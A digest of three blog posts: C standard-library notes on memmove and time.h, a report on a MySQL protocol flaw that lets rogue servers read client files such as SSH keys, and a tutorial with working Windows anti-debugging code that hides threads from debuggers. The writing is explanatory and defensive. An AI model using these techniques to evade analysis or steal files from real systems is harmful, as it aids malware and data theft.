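Taken literally, that “as if” wording can be sketched as follows. This is only an illustration of the specification’s description, not how any real library implements memmove; the name memmove_via_buffer is hypothetical, and unlike the real function this version can fail when the scratch allocation fails.

```c
#include <stdlib.h>
#include <string.h>

/* Hypothetical name. Follows the "as if" description literally:
 * copy the source into a scratch buffer, then copy that buffer into
 * the destination, so overlap between s and d cannot matter. */
void *memmove_via_buffer(void *d, const void *s, size_t n)
{
    unsigned char *tmp;

    if (n == 0)
        return d;

    tmp = malloc(n);
    if (tmp == NULL)
        return NULL;    /* the standard memmove has no failure mode; this sketch does */

    memcpy(tmp, s, n);  /* source and scratch buffer never overlap */
    memcpy(d, tmp, n);  /* scratch buffer and destination never overlap */
    free(tmp);
    return d;
}
```

The cost is an allocation and two passes over the data for every call.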
When I tried writing it that is exactly what I did, but Plauger has a faster way:

    void *(memmove)(void *d, const void *s, size_t n)
    {
        unsigned char *ds = d;
        const unsigned char *ss = s;

        if (s > d)
            /* destination starts before source: copy left to right */
            while (n-- > 0)
                *ds++ = *ss++;
        else
            /* destination starts at or after source: copy right to left */
            for (ss += n, ds += n; 0 < n; --n)
                *--ds = *--ss;
        return d;
    }

This compares the pointer positions to see which occurs before the other in memory, then does the copy from left to right or right to left depending on which comes before the other. When copying right to left, the pointers start one past the end of each area, so they must be decremented before each byte is copied. This is very fast and uses no extra space.

However, isn’t comparing random pointers undefined behavior? C allows you to compare pointers within the same primary data object (like the addresses of different cells in the same array), but not any random pointers. Objects could be in different segments of a segmented memory architecture, or even in totally different memory banks such as in a Harvard architecture. But with memmove why would you call it when copying one data object into a totally different one? There would be no danger that they overlap, unless you are copying too many bytes, which is already its own big problem. Thus we can assume that the pointers to memmove are in the same data object and thus comparable.

What this also tells me is not to indiscriminately use memmove all the time in order to be “safe” or something, because some implementations like Plauger’s would then cause undefined behavior.

One other thing to note about the memmove implementation is that it uses unsigned char pointers to do the work rather than void pointers. Doing pointer arithmetic on void* is a GNU-ism not permitted in portable C.

One nice property of returning the destination address from the string.h functions is that they can chain together:

    if (strcmp(strncat(strcpy(s, "abcde"), "fg", 1), "abcdef")) ...;

Those are the notes I wanted to share for this header. Also C99 introduces wide character versions of these functions in wchar.h.

time.h

First, the C standard is very lenient about this header.
It has functions to do all kinds of conversions, but the bigger picture is that implementations are allowed to make their “best approximation” to the date and time. Some of them might do a bad job and yet still conform to the standard. Many C environments do not support the concepts of daylight saving time or time zones. Both notions are defined geographically and politically, and thus may require more knowledge about the real world than an implementation can support.

There are a lot of details in this header that I don’t want to regurgitate, but it is useful to see how the functions convert between the data types. I made a graph to make it clearer.

One thing I didn’t know was that the header provides a clock() function to measure the CPU time elapsed since program start. It also reports that time in units of 1/CLOCKS_PER_SEC of a second, and CLOCKS_PER_SEC is often higher than one. The rest of the library is limited to nothing smaller than seconds of precision.

Source: https://begriffs.com/posts/2019-01-19-inside-c-standard-lib.html
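As a footnote to the time.h notes above, here is a small sketch of how clock() and CLOCKS_PER_SEC are typically combined to measure CPU time. The helper names cpu_seconds and busy_work are hypothetical and exist only for this illustration; the actual tick resolution is implementation-defined.

```c
#include <time.h>

/* Hypothetical helper: CPU seconds consumed between two clock() readings. */
double cpu_seconds(clock_t start, clock_t end)
{
    return (double)(end - start) / CLOCKS_PER_SEC;
}

/* Hypothetical workload, present only to burn a little CPU time.
 * Returns the sum 0 + 1 + ... + (iterations - 1). */
unsigned long busy_work(unsigned long iterations)
{
    volatile unsigned long acc = 0;   /* volatile keeps the loop from being optimized away */
    unsigned long i;

    for (i = 0; i < iterations; i++)
        acc += i;
    return acc;
}
```

To use it, take one clock() reading before the work and one after, then pass both to cpu_seconds. Note that this measures processor time used by the program, not wall-clock time, so time spent sleeping or blocked on I/O is not counted.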
  14. MySQL client allows MySQL server to request any local file

Sunday January 20, 2019 in Security, Magecart

This week I discovered that large ecommerce and government sites got hacked via the Adminer database tool. As it turns out, the root cause is a protocol flaw in MySQL. Curiously, it is described in the official documentation, which says:

“The transfer of the file from the client host to the server host is initiated by the MySQL server. In theory, a patched server could be built that would tell the client program to transfer a file of the server’s choosing rather than the file named by the client in the LOAD DATA statement. Such a server could access any file on the client host to which the client user has read access. (A patched server could in fact reply with a file-transfer request to any statement, not just LOAD DATA LOCAL, so a more fundamental issue is that clients should not connect to untrusted servers.)”

“In theory”? An Evil Mysql Server which does exactly that can be found on Github, and was likely used to exfiltrate passwords from these hacked sites. It could also be used to steal SSH keys and crypto wallets, as interfail points out.

The server has to know the full path of the file on the client for it to succeed. However, by first requesting /proc/self/environ, the server can learn a great deal about the folder structure on the client.

Several clients and libraries have built-in protection for this “feature”, or disable it by default (e.g. Golang, Python, PHP-PDO). But not all, as the Adminer case demonstrates. And Adminer probably won’t be the last.

Source: https://gwillem.gitlab.io/2019/01/20/sites-hacked-via-mysql-protocal-flaw/
  15. Anti Debugging Tricks #4 – Hidden Threads

timb3r - reverse engineering, January 19, 2019

Has this ever happened to you? You’re playing around with some application and it crashes the moment you attach a debugger? Ever wondered why or how? I do. These types of questions keep me awake at night.

I first became aware of this technique while cruising around some forums on the internet, where people were typically asking for a bypass or a method to work around it. But I was more interested in HOW this technique works and less interested in how to bypass it. During my research phase I noticed that the application would crash out with:

    Unhandled exception code 80000003

But that’s an int 3 exception? How is the debugger not catching that? What the actual hell. Searching around for information I discovered that NtSetInformationThread has a parameter of type THREADINFOCLASS, which contains this interesting value:

    ThreadHideFromDebugger = 0x11

Why Hans?

You may be wondering why this is even a ‘feature’ of Windows? Wouldn’t malware abuse the hell out of this? Yes, probably. But here’s why it exists: when you attach a debugger to a remote process a new thread is created. If this was just a normal thread the debugger would be caught in an endless loop as it attempted to stop its own execution. So behind the scenes, when the debugging thread is created, Windows calls NtSetInformationThread with the ThreadHideFromDebugger flag set (1). This way the process can be debugged and a deadlock prevented, allowing code execution to continue as normal. However, now that this thread is hidden from the debugger, any breakpoints or exceptions that are triggered will cause the process to crash. Because the debugger cannot see this thread, it is unable to trap these events.
So as it turned out some devious individual noticed this odd behaviour and thought: “this would make a really cool anti-debug feature”. Now we’re here with this method widespread enough for me to be aware of it.

Das Kode

So what’s it actually look like in code? I wasn’t able to find any live examples so I constructed my own based on how I thought it should work:

    #include <stdio.h>
    #include <windows.h>

    typedef enum _THREADINFOCLASS { ThreadHideFromDebugger = 0x11 } THREADINFOCLASS;

    typedef NTSTATUS (WINAPI *NtQueryInformationThread_t)(HANDLE, THREADINFOCLASS, PVOID, ULONG, PULONG);
    typedef NTSTATUS (WINAPI *NtSetInformationThread_t)(HANDLE, THREADINFOCLASS, PVOID, ULONG);

    NtQueryInformationThread_t fnNtQueryInformationThread = NULL;
    NtSetInformationThread_t fnNtSetInformationThread = NULL;

    DWORD WINAPI ThreadMain(LPVOID p)
    {
        while(1)
        {
            // This can be any trigger; IsDebuggerPresent() is used for demo purposes
            if(IsDebuggerPresent())
                // MinGW syntax; on MSVC replace with __asm { int 3; }
                asm("int3");
            Sleep(500);
        }
        return 0;
    }

    int main(void)
    {
        DWORD dwThreadId = 0;
        HANDLE hThread = CreateThread(NULL, 0, ThreadMain, NULL, 0, &dwThreadId);

        // Resolve the undocumented Nt* functions from ntdll.dll at runtime
        HMODULE hDLL = LoadLibrary("ntdll.dll");
        if(!hDLL) return -1;

        fnNtQueryInformationThread = (NtQueryInformationThread_t)GetProcAddress(hDLL, "NtQueryInformationThread");
        fnNtSetInformationThread = (NtSetInformationThread_t)GetProcAddress(hDLL, "NtSetInformationThread");
        if(!fnNtQueryInformationThread || !fnNtSetInformationThread)
            return -1;

        ULONG lHideThread = 1, lRet = 0;

        // Hide the worker thread from any debugger, then read the flag back
        fnNtSetInformationThread(hThread, ThreadHideFromDebugger, &lHideThread, sizeof(lHideThread));
        fnNtQueryInformationThread(hThread, ThreadHideFromDebugger, &lHideThread, sizeof(lHideThread), &lRet);
        printf("Thread is hidden: %s\n", lHideThread ? "Yes" : "No");

        WaitForSingleObject(hThread, INFINITE);
        return 0;
    }

Pretty simple yes?
Now if you run the program and attempt to attach a debugger you’ll get this interesting crash:

    0036:err:seh:raise_exception Unhandled exception code 80000003 flags 0 addr 0x401566

Oh ho ho! Poor Tony

Throwing Hans off Nakatomi

Well, now that we’ve established how this works we can look at beating it. There are a number of ways, including:

    Hooking the required Nt function calls.
    Replacing the int 3 instruction with a nop.
    Nopping or hooking the “trigger” function.

I opted for nopping out int 3. You can use your tool of choice to locate the required int 3 instruction; you’ll have to search around a bit. Once you have found the thread with the check, you can nop that sucka out. Attaching a debugger and resuming execution will then result in everything working as expected.

Bye Hans Ho-ho-ho

Source: https://gamephreakers.com/2019/01/anti-debugging-tricks-4-hidden-threads/